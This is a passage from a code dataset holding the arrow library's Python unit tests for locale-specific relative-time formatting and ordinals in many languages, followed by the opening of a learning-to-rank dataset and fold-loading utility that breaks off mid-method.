content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from chai import Chai
from arrow import arrow, locales
class ModuleTests(Chai):
def test_get_locale(self):
mock_locales = self.mock(locales, "_locales")
mock_locale_cls = self.mock()
mock_locale = self.mock()
self.expect(mock_locales.get).args("name").returns(mock_locale_cls)
self.expect(mock_locale_cls).returns(mock_locale)
result = locales.get_locale("name")
self.assertEqual(result, mock_locale)
def test_locales(self):
self.assertTrue(len(locales._locales) > 0)
class LocaleTests(Chai):
def setUp(self):
super(LocaleTests, self).setUp()
self.locale = locales.EnglishLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 hours")
self.assertEqual(self.locale._format_timeframe("hour", 0), "an hour")
def test_format_relative_now(self):
result = self.locale._format_relative("just now", "now", 0)
self.assertEqual(result, "just now")
def test_format_relative_past(self):
result = self.locale._format_relative("an hour", "hour", 1)
self.assertEqual(result, "in an hour")
def test_format_relative_future(self):
result = self.locale._format_relative("an hour", "hour", -1)
self.assertEqual(result, "an hour ago")
def test_ordinal_number(self):
self.assertEqual(self.locale.ordinal_number(0), "0th")
self.assertEqual(self.locale.ordinal_number(1), "1st")
self.assertEqual(self.locale.ordinal_number(2), "2nd")
self.assertEqual(self.locale.ordinal_number(3), "3rd")
self.assertEqual(self.locale.ordinal_number(4), "4th")
self.assertEqual(self.locale.ordinal_number(10), "10th")
self.assertEqual(self.locale.ordinal_number(11), "11th")
self.assertEqual(self.locale.ordinal_number(12), "12th")
self.assertEqual(self.locale.ordinal_number(13), "13th")
self.assertEqual(self.locale.ordinal_number(14), "14th")
self.assertEqual(self.locale.ordinal_number(21), "21st")
self.assertEqual(self.locale.ordinal_number(22), "22nd")
self.assertEqual(self.locale.ordinal_number(23), "23rd")
self.assertEqual(self.locale.ordinal_number(24), "24th")
self.assertEqual(self.locale.ordinal_number(100), "100th")
self.assertEqual(self.locale.ordinal_number(101), "101st")
self.assertEqual(self.locale.ordinal_number(102), "102nd")
self.assertEqual(self.locale.ordinal_number(103), "103rd")
self.assertEqual(self.locale.ordinal_number(104), "104th")
self.assertEqual(self.locale.ordinal_number(110), "110th")
self.assertEqual(self.locale.ordinal_number(111), "111th")
self.assertEqual(self.locale.ordinal_number(112), "112th")
self.assertEqual(self.locale.ordinal_number(113), "113th")
self.assertEqual(self.locale.ordinal_number(114), "114th")
self.assertEqual(self.locale.ordinal_number(121), "121st")
self.assertEqual(self.locale.ordinal_number(122), "122nd")
self.assertEqual(self.locale.ordinal_number(123), "123rd")
self.assertEqual(self.locale.ordinal_number(124), "124th")
def test_meridian_invalid_token(self):
self.assertEqual(self.locale.meridian(7, None), None)
self.assertEqual(self.locale.meridian(7, "B"), None)
self.assertEqual(self.locale.meridian(7, "NONSENSE"), None)
class EnglishLocaleTests(Chai):
def setUp(self):
super(EnglishLocaleTests, self).setUp()
self.locale = locales.EnglishLocale()
def test_describe(self):
self.assertEqual(self.locale.describe("now", only_distance=True), "instantly")
self.assertEqual(self.locale.describe("now", only_distance=False), "just now")
class ItalianLocalesTests(Chai):
def test_ordinal_number(self):
locale = locales.ItalianLocale()
self.assertEqual(locale.ordinal_number(1), "1º")
class SpanishLocalesTests(Chai):
def test_ordinal_number(self):
locale = locales.SpanishLocale()
self.assertEqual(locale.ordinal_number(1), "1º")
class FrenchLocalesTests(Chai):
def test_ordinal_number(self):
locale = locales.FrenchLocale()
self.assertEqual(locale.ordinal_number(1), "1er")
self.assertEqual(locale.ordinal_number(2), "2e")
class RussianLocalesTests(Chai):
def test_plurals2(self):
locale = locales.RussianLocale()
self.assertEqual(locale._format_timeframe("hours", 0), "0 часов")
self.assertEqual(locale._format_timeframe("hours", 1), "1 час")
self.assertEqual(locale._format_timeframe("hours", 2), "2 часа")
self.assertEqual(locale._format_timeframe("hours", 4), "4 часа")
self.assertEqual(locale._format_timeframe("hours", 5), "5 часов")
self.assertEqual(locale._format_timeframe("hours", 21), "21 час")
self.assertEqual(locale._format_timeframe("hours", 22), "22 часа")
self.assertEqual(locale._format_timeframe("hours", 25), "25 часов")
# feminine grammatical gender should be tested separately
self.assertEqual(locale._format_timeframe("minutes", 0), "0 минут")
self.assertEqual(locale._format_timeframe("minutes", 1), "1 минуту")
self.assertEqual(locale._format_timeframe("minutes", 2), "2 минуты")
self.assertEqual(locale._format_timeframe("minutes", 4), "4 минуты")
self.assertEqual(locale._format_timeframe("minutes", 5), "5 минут")
self.assertEqual(locale._format_timeframe("minutes", 21), "21 минуту")
self.assertEqual(locale._format_timeframe("minutes", 22), "22 минуты")
self.assertEqual(locale._format_timeframe("minutes", 25), "25 минут")
class PolishLocalesTests(Chai):
def test_plurals(self):
locale = locales.PolishLocale()
self.assertEqual(locale._format_timeframe("hours", 0), "0 godzin")
self.assertEqual(locale._format_timeframe("hours", 1), "1 godzin")
self.assertEqual(locale._format_timeframe("hours", 2), "2 godziny")
self.assertEqual(locale._format_timeframe("hours", 4), "4 godziny")
self.assertEqual(locale._format_timeframe("hours", 5), "5 godzin")
self.assertEqual(locale._format_timeframe("hours", 21), "21 godzin")
self.assertEqual(locale._format_timeframe("hours", 22), "22 godziny")
self.assertEqual(locale._format_timeframe("hours", 25), "25 godzin")
class IcelandicLocalesTests(Chai):
def setUp(self):
super(IcelandicLocalesTests, self).setUp()
self.locale = locales.IcelandicLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("minute", -1), "einni mínútu")
self.assertEqual(self.locale._format_timeframe("minute", 1), "eina mínútu")
self.assertEqual(self.locale._format_timeframe("hours", -2), "2 tímum")
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 tíma")
self.assertEqual(self.locale._format_timeframe("now", 0), "rétt í þessu")
class MalayalamLocaleTests(Chai):
def setUp(self):
super(MalayalamLocaleTests, self).setUp()
self.locale = locales.MalayalamLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 മണിക്കൂർ")
self.assertEqual(self.locale._format_timeframe("hour", 0), "ഒരു മണിക്കൂർ")
def test_format_relative_now(self):
result = self.locale._format_relative("ഇപ്പോൾ", "now", 0)
self.assertEqual(result, "ഇപ്പോൾ")
def test_format_relative_past(self):
result = self.locale._format_relative("ഒരു മണിക്കൂർ", "hour", 1)
self.assertEqual(result, "ഒരു മണിക്കൂർ ശേഷം")
def test_format_relative_future(self):
result = self.locale._format_relative("ഒരു മണിക്കൂർ", "hour", -1)
self.assertEqual(result, "ഒരു മണിക്കൂർ മുമ്പ്")
class HindiLocaleTests(Chai):
def setUp(self):
super(HindiLocaleTests, self).setUp()
self.locale = locales.HindiLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 घंटे")
self.assertEqual(self.locale._format_timeframe("hour", 0), "एक घंटा")
def test_format_relative_now(self):
result = self.locale._format_relative("अभी", "now", 0)
self.assertEqual(result, "अभी")
def test_format_relative_past(self):
result = self.locale._format_relative("एक घंटा", "hour", 1)
self.assertEqual(result, "एक घंटा बाद")
def test_format_relative_future(self):
result = self.locale._format_relative("एक घंटा", "hour", -1)
self.assertEqual(result, "एक घंटा पहले")
class CzechLocaleTests(Chai):
def setUp(self):
super(CzechLocaleTests, self).setUp()
self.locale = locales.CzechLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 hodiny")
self.assertEqual(self.locale._format_timeframe("hours", 5), "5 hodin")
self.assertEqual(self.locale._format_timeframe("hour", 0), "0 hodin")
self.assertEqual(self.locale._format_timeframe("hours", -2), "2 hodinami")
self.assertEqual(self.locale._format_timeframe("hours", -5), "5 hodinami")
self.assertEqual(self.locale._format_timeframe("now", 0), "Teď")
def test_format_relative_now(self):
result = self.locale._format_relative("Teď", "now", 0)
self.assertEqual(result, "Teď")
def test_format_relative_future(self):
result = self.locale._format_relative("hodinu", "hour", 1)
self.assertEqual(result, "Za hodinu")
def test_format_relative_past(self):
result = self.locale._format_relative("hodinou", "hour", -1)
self.assertEqual(result, "Před hodinou")
class SlovakLocaleTests(Chai):
def setUp(self):
super(SlovakLocaleTests, self).setUp()
self.locale = locales.SlovakLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 hodiny")
self.assertEqual(self.locale._format_timeframe("hours", 5), "5 hodín")
self.assertEqual(self.locale._format_timeframe("hour", 0), "0 hodín")
self.assertEqual(self.locale._format_timeframe("hours", -2), "2 hodinami")
self.assertEqual(self.locale._format_timeframe("hours", -5), "5 hodinami")
self.assertEqual(self.locale._format_timeframe("now", 0), "Teraz")
def test_format_relative_now(self):
result = self.locale._format_relative("Teraz", "now", 0)
self.assertEqual(result, "Teraz")
def test_format_relative_future(self):
result = self.locale._format_relative("hodinu", "hour", 1)
self.assertEqual(result, "O hodinu")
def test_format_relative_past(self):
result = self.locale._format_relative("hodinou", "hour", -1)
self.assertEqual(result, "Pred hodinou")
class BulgarianLocaleTests(Chai):
def test_plurals2(self):
locale = locales.BulgarianLocale()
self.assertEqual(locale._format_timeframe("hours", 0), "0 часа")
self.assertEqual(locale._format_timeframe("hours", 1), "1 час")
self.assertEqual(locale._format_timeframe("hours", 2), "2 часа")
self.assertEqual(locale._format_timeframe("hours", 4), "4 часа")
self.assertEqual(locale._format_timeframe("hours", 5), "5 часа")
self.assertEqual(locale._format_timeframe("hours", 21), "21 час")
self.assertEqual(locale._format_timeframe("hours", 22), "22 часа")
self.assertEqual(locale._format_timeframe("hours", 25), "25 часа")
# feminine grammatical gender should be tested separately
self.assertEqual(locale._format_timeframe("minutes", 0), "0 минути")
self.assertEqual(locale._format_timeframe("minutes", 1), "1 минута")
self.assertEqual(locale._format_timeframe("minutes", 2), "2 минути")
self.assertEqual(locale._format_timeframe("minutes", 4), "4 минути")
self.assertEqual(locale._format_timeframe("minutes", 5), "5 минути")
self.assertEqual(locale._format_timeframe("minutes", 21), "21 минута")
self.assertEqual(locale._format_timeframe("minutes", 22), "22 минути")
self.assertEqual(locale._format_timeframe("minutes", 25), "25 минути")
class MacedonianLocaleTests(Chai):
def test_plurals_mk(self):
locale = locales.MacedonianLocale()
# time
self.assertEqual(locale._format_relative("сега", "now", 0), "сега")
# Hours
self.assertEqual(locale._format_timeframe("hours", 0), "0 саати")
self.assertEqual(locale._format_timeframe("hours", 1), "1 саат")
self.assertEqual(locale._format_timeframe("hours", 2), "2 саати")
self.assertEqual(locale._format_timeframe("hours", 4), "4 саати")
self.assertEqual(locale._format_timeframe("hours", 5), "5 саати")
self.assertEqual(locale._format_timeframe("hours", 21), "21 саат")
self.assertEqual(locale._format_timeframe("hours", 22), "22 саати")
self.assertEqual(locale._format_timeframe("hours", 25), "25 саати")
# Minutes
self.assertEqual(locale._format_timeframe("minutes", 0), "0 минути")
self.assertEqual(locale._format_timeframe("minutes", 1), "1 минута")
self.assertEqual(locale._format_timeframe("minutes", 2), "2 минути")
self.assertEqual(locale._format_timeframe("minutes", 4), "4 минути")
self.assertEqual(locale._format_timeframe("minutes", 5), "5 минути")
self.assertEqual(locale._format_timeframe("minutes", 21), "21 минута")
self.assertEqual(locale._format_timeframe("minutes", 22), "22 минути")
self.assertEqual(locale._format_timeframe("minutes", 25), "25 минути")
class HebrewLocaleTests(Chai):
def test_couple_of_timeframe(self):
locale = locales.HebrewLocale()
self.assertEqual(locale._format_timeframe("hours", 2), "שעתיים")
self.assertEqual(locale._format_timeframe("months", 2), "חודשיים")
self.assertEqual(locale._format_timeframe("days", 2), "יומיים")
self.assertEqual(locale._format_timeframe("years", 2), "שנתיים")
self.assertEqual(locale._format_timeframe("hours", 3), "3 שעות")
self.assertEqual(locale._format_timeframe("months", 4), "4 חודשים")
self.assertEqual(locale._format_timeframe("days", 3), "3 ימים")
self.assertEqual(locale._format_timeframe("years", 5), "5 שנים")
class MarathiLocaleTests(Chai):
def setUp(self):
super(MarathiLocaleTests, self).setUp()
self.locale = locales.MarathiLocale()
def test_dateCoreFunctionality(self):
dt = arrow.Arrow(2015, 4, 11, 17, 30, 00)
self.assertEqual(self.locale.month_name(dt.month), "एप्रिल")
self.assertEqual(self.locale.month_abbreviation(dt.month), "एप्रि")
self.assertEqual(self.locale.day_name(dt.isoweekday()), "शनिवार")
self.assertEqual(self.locale.day_abbreviation(dt.isoweekday()), "शनि")
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 तास")
self.assertEqual(self.locale._format_timeframe("hour", 0), "एक तास")
def test_format_relative_now(self):
result = self.locale._format_relative("सद्य", "now", 0)
self.assertEqual(result, "सद्य")
def test_format_relative_past(self):
result = self.locale._format_relative("एक तास", "hour", 1)
self.assertEqual(result, "एक तास नंतर")
def test_format_relative_future(self):
result = self.locale._format_relative("एक तास", "hour", -1)
self.assertEqual(result, "एक तास आधी")
# Not currently implemented
def test_ordinal_number(self):
self.assertEqual(self.locale.ordinal_number(1), "1")
class FinnishLocaleTests(Chai):
def setUp(self):
super(FinnishLocaleTests, self).setUp()
self.locale = locales.FinnishLocale()
def test_format_timeframe(self):
self.assertEqual(
self.locale._format_timeframe("hours", 2), ("2 tuntia", "2 tunnin")
)
self.assertEqual(self.locale._format_timeframe("hour", 0), ("tunti", "tunnin"))
def test_format_relative_now(self):
result = self.locale._format_relative(["juuri nyt", "juuri nyt"], "now", 0)
self.assertEqual(result, "juuri nyt")
def test_format_relative_past(self):
result = self.locale._format_relative(["tunti", "tunnin"], "hour", 1)
self.assertEqual(result, "tunnin kuluttua")
def test_format_relative_future(self):
result = self.locale._format_relative(["tunti", "tunnin"], "hour", -1)
self.assertEqual(result, "tunti sitten")
def test_ordinal_number(self):
self.assertEqual(self.locale.ordinal_number(1), "1.")
class GermanLocaleTests(Chai):
def setUp(self):
super(GermanLocaleTests, self).setUp()
self.locale = locales.GermanLocale()
def test_ordinal_number(self):
self.assertEqual(self.locale.ordinal_number(1), "1.")
def test_define(self):
self.assertEqual(
self.locale.describe("minute", only_distance=True), "eine Minute"
)
self.assertEqual(
self.locale.describe("minute", only_distance=False), "in einer Minute"
)
self.assertEqual(
self.locale.describe("hour", only_distance=True), "eine Stunde"
)
self.assertEqual(
self.locale.describe("hour", only_distance=False), "in einer Stunde"
)
self.assertEqual(self.locale.describe("day", only_distance=True), "ein Tag")
self.assertEqual(
self.locale.describe("day", only_distance=False), "in einem Tag"
)
self.assertEqual(self.locale.describe("month", only_distance=True), "ein Monat")
self.assertEqual(
self.locale.describe("month", only_distance=False), "in einem Monat"
)
self.assertEqual(self.locale.describe("year", only_distance=True), "ein Jahr")
self.assertEqual(
self.locale.describe("year", only_distance=False), "in einem Jahr"
)
class HungarianLocaleTests(Chai):
def setUp(self):
super(HungarianLocaleTests, self).setUp()
self.locale = locales.HungarianLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 óra")
self.assertEqual(self.locale._format_timeframe("hour", 0), "egy órával")
self.assertEqual(self.locale._format_timeframe("hours", -2), "2 órával")
self.assertEqual(self.locale._format_timeframe("now", 0), "éppen most")
class EsperantoLocaleTests(Chai):
def setUp(self):
super(EsperantoLocaleTests, self).setUp()
self.locale = locales.EsperantoLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 horoj")
self.assertEqual(self.locale._format_timeframe("hour", 0), "un horo")
self.assertEqual(self.locale._format_timeframe("hours", -2), "2 horoj")
self.assertEqual(self.locale._format_timeframe("now", 0), "nun")
def test_ordinal_number(self):
self.assertEqual(self.locale.ordinal_number(1), "1a")
class ThaiLocaleTests(Chai):
def setUp(self):
super(ThaiLocaleTests, self).setUp()
self.locale = locales.ThaiLocale()
def test_year_full(self):
self.assertEqual(self.locale.year_full(2015), "2558")
def test_year_abbreviation(self):
self.assertEqual(self.locale.year_abbreviation(2015), "58")
def test_format_relative_now(self):
result = self.locale._format_relative("ขณะนี้", "now", 0)
self.assertEqual(result, "ขณะนี้")
def test_format_relative_past(self):
result = self.locale._format_relative("1 ชั่วโมง", "hour", 1)
self.assertEqual(result, "ในอีก 1 ชั่วโมง")
result = self.locale._format_relative("{0} ชั่วโมง", "hours", 2)
self.assertEqual(result, "ในอีก {0} ชั่วโมง")
result = self.locale._format_relative("ไม่กี่วินาที", "seconds", 42)
self.assertEqual(result, "ในอีกไม่กี่วินาที")
def test_format_relative_future(self):
result = self.locale._format_relative("1 ชั่วโมง", "hour", -1)
self.assertEqual(result, "1 ชั่วโมง ที่ผ่านมา")
class BengaliLocaleTests(Chai):
def setUp(self):
super(BengaliLocaleTests, self).setUp()
self.locale = locales.BengaliLocale()
def test_ordinal_number(self):
result0 = self.locale._ordinal_number(0)
result1 = self.locale._ordinal_number(1)
result3 = self.locale._ordinal_number(3)
result4 = self.locale._ordinal_number(4)
result5 = self.locale._ordinal_number(5)
result6 = self.locale._ordinal_number(6)
result10 = self.locale._ordinal_number(10)
result11 = self.locale._ordinal_number(11)
result42 = self.locale._ordinal_number(42)
self.assertEqual(result0, "0তম")
self.assertEqual(result1, "1ম")
self.assertEqual(result3, "3য়")
self.assertEqual(result4, "4র্থ")
self.assertEqual(result5, "5ম")
self.assertEqual(result6, "6ষ্ঠ")
self.assertEqual(result10, "10ম")
self.assertEqual(result11, "11তম")
self.assertEqual(result42, "42তম")
self.assertEqual(self.locale._ordinal_number(-1), None)
class SwissLocaleTests(Chai):
def setUp(self):
super(SwissLocaleTests, self).setUp()
self.locale = locales.SwissLocale()
def test_ordinal_number(self):
dt = arrow.Arrow(2015, 4, 11, 17, 30, 00)
self.assertEqual(self.locale._format_timeframe("minute", 1), "einer Minute")
self.assertEqual(self.locale._format_timeframe("hour", 1), "einer Stunde")
self.assertEqual(self.locale.day_abbreviation(dt.isoweekday()), "Sa")
class RomanianLocaleTests(Chai):
def setUp(self):
super(RomanianLocaleTests, self).setUp()
self.locale = locales.RomanianLocale()
def test_timeframes(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 ore")
self.assertEqual(self.locale._format_timeframe("months", 2), "2 luni")
self.assertEqual(self.locale._format_timeframe("days", 2), "2 zile")
self.assertEqual(self.locale._format_timeframe("years", 2), "2 ani")
self.assertEqual(self.locale._format_timeframe("hours", 3), "3 ore")
self.assertEqual(self.locale._format_timeframe("months", 4), "4 luni")
self.assertEqual(self.locale._format_timeframe("days", 3), "3 zile")
self.assertEqual(self.locale._format_timeframe("years", 5), "5 ani")
def test_relative_timeframes(self):
self.assertEqual(self.locale._format_relative("acum", "now", 0), "acum")
self.assertEqual(
self.locale._format_relative("o oră", "hour", 1), "peste o oră"
)
self.assertEqual(
self.locale._format_relative("o oră", "hour", -1), "o oră în urmă"
)
self.assertEqual(
self.locale._format_relative("un minut", "minute", 1), "peste un minut"
)
self.assertEqual(
self.locale._format_relative("un minut", "minute", -1), "un minut în urmă"
)
self.assertEqual(
self.locale._format_relative("câteva secunde", "seconds", -1),
"câteva secunde în urmă",
)
self.assertEqual(
self.locale._format_relative("câteva secunde", "seconds", 1),
"peste câteva secunde",
)
self.assertEqual(
self.locale._format_relative("o zi", "day", -1), "o zi în urmă"
)
self.assertEqual(self.locale._format_relative("o zi", "day", 1), "peste o zi")
class ArabicLocalesTest(Chai):
def setUp(self):
super(ArabicLocalesTest, self).setUp()
self.locale = locales.ArabicLocale()
def test_timeframes(self):
# single
self.assertEqual(self.locale._format_timeframe("minute", 1), "دقيقة")
self.assertEqual(self.locale._format_timeframe("hour", 1), "ساعة")
self.assertEqual(self.locale._format_timeframe("day", 1), "يوم")
self.assertEqual(self.locale._format_timeframe("month", 1), "شهر")
self.assertEqual(self.locale._format_timeframe("year", 1), "سنة")
# double
self.assertEqual(self.locale._format_timeframe("minutes", 2), "دقيقتين")
self.assertEqual(self.locale._format_timeframe("hours", 2), "ساعتين")
self.assertEqual(self.locale._format_timeframe("days", 2), "يومين")
self.assertEqual(self.locale._format_timeframe("months", 2), "شهرين")
self.assertEqual(self.locale._format_timeframe("years", 2), "سنتين")
# up to ten
self.assertEqual(self.locale._format_timeframe("minutes", 3), "3 دقائق")
self.assertEqual(self.locale._format_timeframe("hours", 4), "4 ساعات")
self.assertEqual(self.locale._format_timeframe("days", 5), "5 أيام")
self.assertEqual(self.locale._format_timeframe("months", 6), "6 أشهر")
self.assertEqual(self.locale._format_timeframe("years", 10), "10 سنوات")
# more than ten
self.assertEqual(self.locale._format_timeframe("minutes", 11), "11 دقيقة")
self.assertEqual(self.locale._format_timeframe("hours", 19), "19 ساعة")
self.assertEqual(self.locale._format_timeframe("months", 24), "24 شهر")
self.assertEqual(self.locale._format_timeframe("days", 50), "50 يوم")
self.assertEqual(self.locale._format_timeframe("years", 115), "115 سنة")
class NepaliLocaleTests(Chai):
def setUp(self):
super(NepaliLocaleTests, self).setUp()
self.locale = locales.NepaliLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("hours", 3), "3 घण्टा")
self.assertEqual(self.locale._format_timeframe("hour", 0), "एक घण्टा")
def test_format_relative_now(self):
result = self.locale._format_relative("अहिले", "now", 0)
self.assertEqual(result, "अहिले")
def test_format_relative_future(self):
result = self.locale._format_relative("एक घण्टा", "hour", 1)
self.assertEqual(result, "एक घण्टा पछी")
def test_format_relative_past(self):
result = self.locale._format_relative("एक घण्टा", "hour", -1)
self.assertEqual(result, "एक घण्टा पहिले")
class IndonesianLocaleTests(Chai):
def setUp(self):
super(IndonesianLocaleTests, self).setUp()
self.locale = locales.IndonesianLocale()
def test_timeframes(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 jam")
self.assertEqual(self.locale._format_timeframe("months", 2), "2 bulan")
self.assertEqual(self.locale._format_timeframe("days", 2), "2 hari")
self.assertEqual(self.locale._format_timeframe("years", 2), "2 tahun")
self.assertEqual(self.locale._format_timeframe("hours", 3), "3 jam")
self.assertEqual(self.locale._format_timeframe("months", 4), "4 bulan")
self.assertEqual(self.locale._format_timeframe("days", 3), "3 hari")
self.assertEqual(self.locale._format_timeframe("years", 5), "5 tahun")
def test_format_relative_now(self):
self.assertEqual(
self.locale._format_relative("baru saja", "now", 0), "baru saja"
)
def test_format_relative_past(self):
self.assertEqual(
self.locale._format_relative("1 jam", "hour", 1), "dalam 1 jam"
)
self.assertEqual(
self.locale._format_relative("1 detik", "seconds", 1), "dalam 1 detik"
)
def test_format_relative_future(self):
self.assertEqual(
self.locale._format_relative("1 jam", "hour", -1), "1 jam yang lalu"
)
class TagalogLocaleTests(Chai):
def setUp(self):
super(TagalogLocaleTests, self).setUp()
self.locale = locales.TagalogLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("minute", 1), "isang minuto")
self.assertEqual(self.locale._format_timeframe("hour", 1), "isang oras")
self.assertEqual(self.locale._format_timeframe("month", 1), "isang buwan")
self.assertEqual(self.locale._format_timeframe("year", 1), "isang taon")
self.assertEqual(self.locale._format_timeframe("seconds", 2), "segundo")
self.assertEqual(self.locale._format_timeframe("minutes", 3), "3 minuto")
self.assertEqual(self.locale._format_timeframe("hours", 4), "4 oras")
self.assertEqual(self.locale._format_timeframe("months", 5), "5 buwan")
self.assertEqual(self.locale._format_timeframe("years", 6), "6 taon")
def test_format_relative_now(self):
self.assertEqual(
self.locale._format_relative("ngayon lang", "now", 0), "ngayon lang"
)
def test_format_relative_past(self):
self.assertEqual(
self.locale._format_relative("2 oras", "hour", 2), "2 oras mula ngayon"
)
def test_format_relative_future(self):
self.assertEqual(
self.locale._format_relative("3 oras", "hour", -3), "nakaraang 3 oras"
)
def test_ordinal_number(self):
self.assertEqual(self.locale.ordinal_number(0), "ika-0")
self.assertEqual(self.locale.ordinal_number(1), "ika-1")
self.assertEqual(self.locale.ordinal_number(2), "ika-2")
self.assertEqual(self.locale.ordinal_number(3), "ika-3")
self.assertEqual(self.locale.ordinal_number(10), "ika-10")
self.assertEqual(self.locale.ordinal_number(23), "ika-23")
self.assertEqual(self.locale.ordinal_number(100), "ika-100")
self.assertEqual(self.locale.ordinal_number(103), "ika-103")
self.assertEqual(self.locale.ordinal_number(114), "ika-114")
class EstonianLocaleTests(Chai):
def setUp(self):
super(EstonianLocaleTests, self).setUp()
self.locale = locales.EstonianLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("now", 0), "just nüüd")
self.assertEqual(self.locale._format_timeframe("second", 1), "ühe sekundi")
self.assertEqual(self.locale._format_timeframe("seconds", 3), "3 sekundi")
self.assertEqual(self.locale._format_timeframe("seconds", 30), "30 sekundi")
self.assertEqual(self.locale._format_timeframe("minute", 1), "ühe minuti")
self.assertEqual(self.locale._format_timeframe("minutes", 4), "4 minuti")
self.assertEqual(self.locale._format_timeframe("minutes", 40), "40 minuti")
self.assertEqual(self.locale._format_timeframe("hour", 1), "tunni aja")
self.assertEqual(self.locale._format_timeframe("hours", 5), "5 tunni")
self.assertEqual(self.locale._format_timeframe("hours", 23), "23 tunni")
self.assertEqual(self.locale._format_timeframe("day", 1), "ühe päeva")
self.assertEqual(self.locale._format_timeframe("days", 6), "6 päeva")
self.assertEqual(self.locale._format_timeframe("days", 12), "12 päeva")
self.assertEqual(self.locale._format_timeframe("month", 1), "ühe kuu")
self.assertEqual(self.locale._format_timeframe("months", 7), "7 kuu")
self.assertEqual(self.locale._format_timeframe("months", 11), "11 kuu")
self.assertEqual(self.locale._format_timeframe("year", 1), "ühe aasta")
self.assertEqual(self.locale._format_timeframe("years", 8), "8 aasta")
self.assertEqual(self.locale._format_timeframe("years", 12), "12 aasta")
self.assertEqual(self.locale._format_timeframe("now", 0), "just nüüd")
self.assertEqual(self.locale._format_timeframe("second", -1), "üks sekund")
self.assertEqual(self.locale._format_timeframe("seconds", -9), "9 sekundit")
self.assertEqual(self.locale._format_timeframe("seconds", -12), "12 sekundit")
self.assertEqual(self.locale._format_timeframe("minute", -1), "üks minut")
self.assertEqual(self.locale._format_timeframe("minutes", -2), "2 minutit")
self.assertEqual(self.locale._format_timeframe("minutes", -10), "10 minutit")
self.assertEqual(self.locale._format_timeframe("hour", -1), "tund aega")
self.assertEqual(self.locale._format_timeframe("hours", -3), "3 tundi")
self.assertEqual(self.locale._format_timeframe("hours", -11), "11 tundi")
self.assertEqual(self.locale._format_timeframe("day", -1), "üks päev")
self.assertEqual(self.locale._format_timeframe("days", -2), "2 päeva")
self.assertEqual(self.locale._format_timeframe("days", -12), "12 päeva")
self.assertEqual(self.locale._format_timeframe("month", -1), "üks kuu")
self.assertEqual(self.locale._format_timeframe("months", -3), "3 kuud")
self.assertEqual(self.locale._format_timeframe("months", -13), "13 kuud")
self.assertEqual(self.locale._format_timeframe("year", -1), "üks aasta")
self.assertEqual(self.locale._format_timeframe("years", -4), "4 aastat")
self.assertEqual(self.locale._format_timeframe("years", -14), "14 aastat")
|
python
|
# -*- coding: utf-8 -*-
# Copyright (C) H.R. Oosterhuis 2021.
# Distributed under the MIT License (see the accompanying README.md and LICENSE files).
import numpy as np
import os.path
import gc
import json
FOLDDATA_WRITE_VERSION = 4
def _add_zero_to_vector(vector):
return np.concatenate([np.zeros(1, dtype=vector.dtype), vector])
def get_dataset_from_json_info(
dataset_name,
info_path,
store_pickle_after_read = True,
read_from_pickle = True,
feature_normalization = True,
purge_test_set = True):
with open(info_path) as f:
all_info = json.load(f)
assert dataset_name in all_info, 'Dataset: %s not found in info file: %s' % (dataset_name, all_info.keys())
set_info = all_info[dataset_name]
assert set_info['num_folds'] == len(set_info['fold_paths']), 'Missing fold paths for %s' % dataset_name
if feature_normalization:
num_feat = set_info['num_unique_feat']
else:
num_feat = set_info['num_nonzero_feat']
return DataSet(dataset_name,
set_info['fold_paths'],
set_info['num_relevance_labels'],
num_feat,
set_info['num_nonzero_feat'],
already_normalized=set_info['query_normalized']
)
class DataSet(object):
"""
Class designed to manage meta-data for datasets.
"""
def __init__(self,
name,
data_paths,
num_rel_labels,
num_features,
num_nonzero_feat,
store_pickle_after_read = True,
read_from_pickle = True,
feature_normalization = True,
purge_test_set = True,
already_normalized=False):
self.name = name
self.num_rel_labels = num_rel_labels
self.num_features = num_features
self.data_paths = data_paths
self.store_pickle_after_read = store_pickle_after_read
self.read_from_pickle = read_from_pickle
self.feature_normalization = feature_normalization
self.purge_test_set = purge_test_set
self._num_nonzero_feat = num_nonzero_feat
def num_folds(self):
return len(self.data_paths)
def get_data_folds(self):
return [DataFold(self, i, path) for i, path in enumerate(self.data_paths)]
class DataFoldSplit(object):
def __init__(self, datafold, name, doclist_ranges, feature_matrix, label_vector):
self.datafold = datafold
self.name = name
self.doclist_ranges = doclist_ranges
self.feature_matrix = feature_matrix
self.label_vector = label_vector
def num_queries(self):
return self.doclist_ranges.shape[0] - 1
def num_docs(self):
return self.feature_matrix.shape[0]
def query_values_from_vector(self, qid, vector):
s_i, e_i = self.query_range(qid)
return vector[s_i:e_i]
def query_range(self, query_index):
s_i = self.doclist_ranges[query_index]
e_i = self.doclist_ranges[query_index+1]
return s_i, e_i
def query_size(self, query_index):
s_i = self.doclist_ranges[query_index]
e_i = self.doclist_ranges[query_index+1]
return e_i - s_i
def query_sizes(self):
return (self.doclist_ranges[1:] - self.doclist_ranges[:-1])
def max_query_size(self):
return np.amax(self.query_sizes())
def query_labels(self, query_index):
s_i = self.doclist_ranges[query_index]
e_i = self.doclist_ranges[query_index+1]
return self.label_vector[s_i:e_i]
def query_feat(self, query_index):
s_i = self.doclist_ranges[query_index]
e_i = self.doclist_ranges[query_index+1]
return self.feature_matrix[s_i:e_i, :]
def doc_feat(self, query_index, doc_index):
s_i = self.doclist_ranges[query_index]
e_i = self.doclist_ranges[query_index+1]
assert s_i + doc_index < self.doclist_ranges[query_index+1]
return self.feature_matrix[s_i + doc_index, :]
def doc_str(self, query_index, doc_index):
